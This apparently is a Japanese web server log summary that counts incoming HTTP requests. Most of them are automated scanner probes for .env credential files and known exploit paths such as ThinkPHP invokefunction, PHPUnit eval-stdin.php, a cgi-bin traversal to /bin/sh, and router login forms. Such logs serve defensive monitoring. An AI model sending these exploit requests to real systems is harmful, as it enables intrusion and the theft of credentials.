2 | python-requests/2.28.1 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_13.67.44.234_80 |
||
2 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
4 | \x16\x03\x01 |
||
1 | GET | /../../mnt/mtd/Config/Account1 |
HTTP/1.1 |
1 | GET | /.docker/.env |
HTTP/1.1 |
1 | GET | /.docker/laravel/app/.env |
HTTP/1.1 |
1 | GET | /.env.backup |
HTTP/1.1 |
1 | GET | /.env.local |
HTTP/1.1 |
1 | GET | /.env.prod.local |
HTTP/1.1 |
1 | GET | /.env.prod |
HTTP/1.1 |
1 | GET | /.env.production.local |
HTTP/1.1 |
33 | GET | /.env |
HTTP/1.1 |
1 | GET | /?%3Cplay%3Ewithme%3C/%3E |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?pp=env |
HTTP/1.1 |
2 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /acme-challenge/.env |
HTTP/1.1 |
1 | GET | /acme_challenges/.env |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /beta/.env |
HTTP/1.1 |
1 | GET | /bootstrap/.env |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
2 | GET | /config/.env |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
2 | GET | /core/.env |
HTTP/1.1 |
1 | GET | /core/app/.env |
HTTP/1.1 |
1 | GET | /doc/.env |
HTTP/1.1 |
1 | GET | /docker/.env |
HTTP/1.1 |
1 | GET | /docker/app/.env |
HTTP/1.1 |
1 | GET | /dotfiles/.env |
HTTP/1.1 |
1 | GET | /en/.env |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /fuN3 |
HTTP/1.0 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /index.php |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /js/.env |
HTTP/1.1 |
1 | GET | /kyc/.env |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /laravel/core/.env |
HTTP/1.1 |
1 | GET | /lib/.env |
HTTP/1.1 |
1 | GET | /libs/.env |
HTTP/1.1 |
9 | GET | /map/baidumap.xml |
HTTP/1.1 |
1 | GET | /phpinfo.php |
HTTP/1.1 |
1 | GET | /phpinfo |
HTTP/1.1 |
2 | GET | /phpmyadmin/index.php |
HTTP/1.1 |
1 | GET | /prod/.env |
HTTP/1.1 |
1 | GET | /pub/.env |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /site/.env |
HTTP/1.1 |
1 | GET | /sitemap.xml |
HTTP/1.1 |
1 | GET | /sites/.env |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /w00tw00t.at[.]ISC[.]SANS[.]DFind:) |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
3 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |